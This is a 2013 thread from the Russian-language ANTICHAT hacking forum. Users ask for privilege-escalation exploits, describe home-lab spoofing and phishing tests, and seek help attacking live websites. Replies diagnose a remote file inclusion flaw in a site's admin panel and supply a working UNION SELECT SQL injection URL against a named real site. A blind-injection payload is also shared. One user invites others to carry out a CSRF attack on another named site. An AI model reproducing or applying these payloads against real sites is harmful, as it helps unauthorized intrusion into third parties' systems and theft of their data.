ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

13.08.2013, 15:38
|
|
Новичок
Регистрация: 20.02.2008
Сообщений: 2
Провел на форуме: 23939
Репутация:
1
|
|
о том как повысить права или експлоит ОС где скачать и как юзать . Но может просто способ есть как присвоить себе права ? kak
|
|
|

14.08.2013, 15:45
|
|
Guest
Сообщений: n/a
Провел на форуме: 1419
Репутация:
0
|
|
Доброго времени суток, господа!
есть у меня ряд вопросов по защите/атаке. чисто гипотетических. т.к. в качестве хобби решил заняться защитой информации. всегда меня это привлекало.
дома на 2х ноута стоит windows 7. "лицензия", всегда свежие обновления от мелко-мягких, над этим всем неустанно бдит касперский со свежими базами.
сеть организована следующим образом, есть модем(он же роутер) в режиме моста. внешний IP динамический.
под виртуалкой на одном из ноутов развернут Kali Linux.
собственно эксперементы в локальной сети уже провел все что смог придумать, да и это не особо интересно. т.к. в домашней локалке только я и жена.
опробовал в локальной сети:
1. dns spoofing. рабтает на ура =) в содружестве с s.e.t. дает просто обалденные результаты.
2. social engeneer toolkit(классная вещь в прямых руках)(получил пароль жены минут за 15... не особое достижение при том что я и так все её пароли знаю. но все равно было приятно что метод работает)
3. различные снифера в пачке с подменой ARP таблиц. (работает на ура!)
4. попробовал metasploit/armitage(вещь конечно грамотная, при наличии открытых уязвимостей), но даже при их наличии выпиливается начисто антивирусом(криптовать пэйлоады пробовал, но видимо руки кривые). специально ставил java машину старой версии, с уязвимостю, но попытка эксплуатации была присечена самой виндой... в моем случае софтина оказалось абсолютно не эффективной.
ну это все лирика. в локалке мне по хорошему бояться нечего. в виду ограниченого круга пользователей локальной сети.
меня больше волнуют атаки из вне. допустим меня хотят взломать(получить доступ к почте/рабочей станции разницы нет). чего мне стоит опасаться? мне на ум приходят следующие атаки:
1. средствами СИ(или еще как) меня заманивают на страницу со зловредным скриптом использующем уязвимость в java или flash или браузере и т.д. я перехожу, скрипт и пэйлоад не пропалились антивирусом. у атакующего профит, он имеет полный контроль над системой и всем что в ней есть.
2. опять же средствами СИ меня заманивают на фэйковый сайт и я как полный лохопет сливаю свои пароли от ресурса. (маловероятно конечно, но и такое возможно, вдруг я буду пьян или упорот)
3. мне присылают вредоноса(батник, powerShell, exe'шник, pdf, flash, офисный документ, что еще можно прислать?) которого я конечно запущу в основной системе а не под виртуалкой с XP...
4. XSS на всеми нами любимом mail.ru(ради интереса поискал при помощи 3х разных сканеров из набора kali) нашел 0. но особо ин не старался. да и чревато это.
если вам есть что добавить по поводу атак из вне, дописывайте мне как раз это и интересно. какие еще варианты атак существуют для получения доступа к компу или кражи почты? почта mail.ru или gmail. другим думаю мало кто сейчас пользуется. корпоративная почта не всчет, пусть об этом голова у службы безопасности болит.
меня интересуют ситуации с атакой на конкретную цель. т.е. в данном случае меня. брутфорс не предлагать. это слишком очевидно.
|
|
|
|

16.08.2013, 13:25
|
|
Guest
Сообщений: n/a
Провел на форуме: 179197
Репутация:
25
|
|
есть сайтик один, в его админке проходя по адресу admin/index.php , сразу в адресной строке показывается /admin/index.php?env=-login:m0--1--s- . Тут получилось добиться пары ошибок:
Если после /admin/index.php?env=- ставить любой символ, допустим123 , то будет ошибка:
Fatal Error: Cannot include "123" - file does not exist in /home/***/public_html/core/kernel/nparser/nparser.php on line 392
Если запрос ставить так /admin/index.php?env=-login:antichat, то получим ошибку:
Fatal Error: Configuration file for prefix antichat is unknown in /home/****/public_html/core/kernel/utility/unit_config_reader.php on line 905
Если вместо admin/index.php?env=-login поставить любые другие символы, то переадресует на /admin/index.php?env=-login:m0--1--s-
Вопрос знатокам, что тут можно попробовать? я так понимаю php inj может быть, с ней не знаком, какие действия попробовать предпринять?
|
|
|
|

16.08.2013, 13:46
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме: 2268
Репутация:
0
|
|
Сообщение от Br@!ns
Br@!ns said:
Fatal Error: Cannot include "123" - file does not exist in /home/***/public_html/core/kernel/nparser/nparser.php on line 392
RFI там, если более фильтраций нет.
Сообщение от None
Если запрос ставить так /admin/index.php?env=-login:antichat, то получим ошибку:
Fatal Error: Configuration file for prefix antichat is unknown in /home/****/public_html/core/kernel/utility/unit_config_reader.php on line 905
Может быть идет через explode разделение, эксперементировать на самом сайте надо. Ссылку в студию!
|
|
|

17.08.2013, 06:49
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
Провел на форуме: 401944
Репутация:
37
|
|
Здравствуйте, часто встречаются сайты в которых blind inj дает одинаковый ответ при true и false выражениях, но при некорректном sql запросе страница меняется. Использовать time based inj получается далеко не всегда. И что же делать? Я знаю про такой тип атаки - and if((substring(version(),1,1)=5),1,(select 1 union select 2)) При true выражении в первом операнде ошибки не будет. Соответственно при false mysql будет выдавать ошибку - страница поменяется. Все это конечно хорошо руками, но как данное дело настроить на sql map, что бы автоматизировать данный процесс? Мб кто нибудь уже пробовал. Заранее спасибо ребят.
|
|
|

17.08.2013, 20:04
|
|
Guest
Сообщений: n/a
Провел на форуме: 94006
Репутация:
24
|
|
Не могу подобрать кол-во столбцов
Код:
Code:
http://crimea.ua/category.php?id=-18+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+
знатоки подскажите
|
|
|
|

17.08.2013, 20:16
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме: 2268
Репутация:
0
|
|
Сообщение от Unknowhacker
Unknowhacker said:
Не могу подобрать кол-во столбцов
Код:
Code:
http://crimea.ua/category.php?id=-18+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+
знатоки подскажите
А почему вы считаете, что здесь есть инъекция? Ни один тест её не подтверждает, тем более мы знаем по именам функций что это mysql.
А вот на соседней странице она имеется:
Код:
Code:
http://crimea.ua/section.php?CatId=9&SecId=75+and+1=2%29+union+select+1,2,3,version%28%29,5+--+
|
|
|

18.08.2013, 14:01
|
|
Guest
Сообщений: n/a
Провел на форуме: 1475
Репутация:
0
|
|
салют, у меня такая проблема при попытке использовать XSRF, не могу сделать автовыполнения запроса так как в строке нет параметра name который должен быть вписан тут можете помочь? заранее спс
|
|
|
|

18.08.2013, 14:58
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме: 2268
Репутация:
0
|
|
Сообщение от nikitos2020
nikitos2020 said:
салют, у меня такая проблема при попытке использовать XSRF, не могу сделать автовыполнения запроса так как в строке нет параметра name который должен быть вписан тут можете помочь? заранее спс
Если вы используете document.forms, вам надо задавать name форме или искать её по id. При статическом задании более-универсален такой варинт:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]getElementById[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'test'[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#0000BB"]submit[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]
[/COLOR]
[/COLOR]
|
|
|

18.08.2013, 18:55
|
|
Guest
Сообщений: n/a
Провел на форуме: 1475
Репутация:
0
|
|
Сообщение от XAMEHA
XAMEHA said:
Если вы используете
document.forms
, вам надо задавать name форме или искать её по id. При статическом задании более-универсален такой варинт:
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]getElementById[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'test'[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#0000BB"]submit[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]
[/COLOR]
[/COLOR]
не бро не прокатило((( может сам попробуешь? https://euroits.com/profile там зарегаться придётся, уязвимость в редактировании профиля, если подставить своё произвольно значение name или id форма несрабатывает, тебя просто перебрасывает на страницу изменения данных, но сами данные не изменины(
P.S при регистрации в поле кошелёк можно ввести "U1234567". попробуй заюзать XSRF если тебе не трудно. у меня на всех таких проектов получалось, но вот с этим беда(
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|